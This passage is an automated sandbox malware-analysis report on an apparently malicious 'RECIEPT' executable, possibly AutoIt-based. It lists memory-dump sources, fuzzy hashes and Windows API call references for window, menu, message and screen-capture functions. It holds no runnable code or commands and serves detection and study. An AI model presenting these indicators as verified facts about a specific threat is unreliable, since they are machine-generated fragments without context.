                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                        • API String ID: 4163708885-3819984048
                                        • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                        • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                        • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                        • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: >>>AUTOIT SCRIPT<<<$\
                                        • API String ID: 0-1896584978
                                        • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                        • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                        • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                        • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __wcsicoll$IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2485277191-404129466
                                        • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                        • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                        • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                        • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                        APIs
                                        • LoadIconW.USER32(?,00000063), ref: 0045464C
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                        • SetWindowTextW.USER32(?,?), ref: 00454678
                                        • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                        • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                        • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                        • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                        • GetWindowRect.USER32(?,?), ref: 004546F5
                                        • SetWindowTextW.USER32(?,?), ref: 00454765
                                        • GetDesktopWindow.USER32 ref: 0045476F
                                        • GetWindowRect.USER32(00000000), ref: 00454776
                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                        • GetClientRect.USER32(?,?), ref: 004547D2
                                        • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                        • String ID:
                                        • API String ID: 3869813825-0
                                        • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                        • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                        • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                        • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                        APIs
                                        • _wcslen.LIBCMT ref: 00464B28
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                        • _wcslen.LIBCMT ref: 00464C28
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                        • _wcslen.LIBCMT ref: 00464CBA
                                        • _wcslen.LIBCMT ref: 00464CD0
                                        • _wcslen.LIBCMT ref: 00464CEF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcslen$Directory$CurrentSystem
                                        • String ID: D
                                        • API String ID: 1914653954-2746444292
                                        • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                        • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                        • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                        • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __wcsicoll
                                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                        • API String ID: 3832890014-4202584635
                                        • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                        • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                        • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                        • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                        APIs
                                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                        • GetFocus.USER32 ref: 0046A0DD
                                        • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessagePost$CtrlFocus
                                        • String ID: 0
                                        • API String ID: 1534620443-4108050209
                                        • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                        • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                        • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                        • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                        APIs
                                        • DestroyWindow.USER32(?), ref: 004558E3
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$CreateDestroy
                                        • String ID: ,$tooltips_class32
                                        • API String ID: 1109047481-3856767331
                                        • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                        • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                        • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                        • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                        • GetMenuItemCount.USER32(?), ref: 00468C45
                                        • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                        • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                        • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                        • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                        • GetMenuItemCount.USER32 ref: 00468CFD
                                        • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                        • GetCursorPos.USER32(?), ref: 00468D3F
                                        • SetForegroundWindow.USER32(?), ref: 00468D49
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                        • String ID: 0
                                        • API String ID: 1441871840-4108050209
                                        • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                        • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                        • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                        • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                        • __swprintf.LIBCMT ref: 00460915
                                        • __swprintf.LIBCMT ref: 0046092D
                                        • _wprintf.LIBCMT ref: 004609E1
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                        • API String ID: 3631882475-2268648507
                                        • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                        • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                        • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                        • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                        APIs
                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                        • SendMessageW.USER32 ref: 00471740
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                        • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                        • SendMessageW.USER32 ref: 0047184F
                                        • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                        • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                        • String ID:
                                        • API String ID: 4116747274-0
                                        • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                        • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                        • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                        • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                        • _wcslen.LIBCMT ref: 00461683
                                        • __swprintf.LIBCMT ref: 00461721
                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                        • GetDlgCtrlID.USER32(?), ref: 00461869
                                        • GetWindowRect.USER32(?,?), ref: 004618A4
                                        • GetParent.USER32(?), ref: 004618C3
                                        • ScreenToClient.USER32(00000000), ref: 004618CA
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                        • String ID: %s%u
                                        • API String ID: 1899580136-679674701
                                        • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                        • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                        • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                        • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                        • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                        • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: InfoItemMenu$Sleep
                                        • String ID: 0
                                        • API String ID: 1196289194-4108050209
                                        • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                        • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                        • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                        • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                        APIs
                                        • GetDC.USER32(00000000), ref: 0043143E
                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                        • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                        • SelectObject.GDI32(00000000,?), ref: 00431466
                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                        • String ID: (
                                        • API String ID: 3300687185-3887548279
                                        • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                        • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                        • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
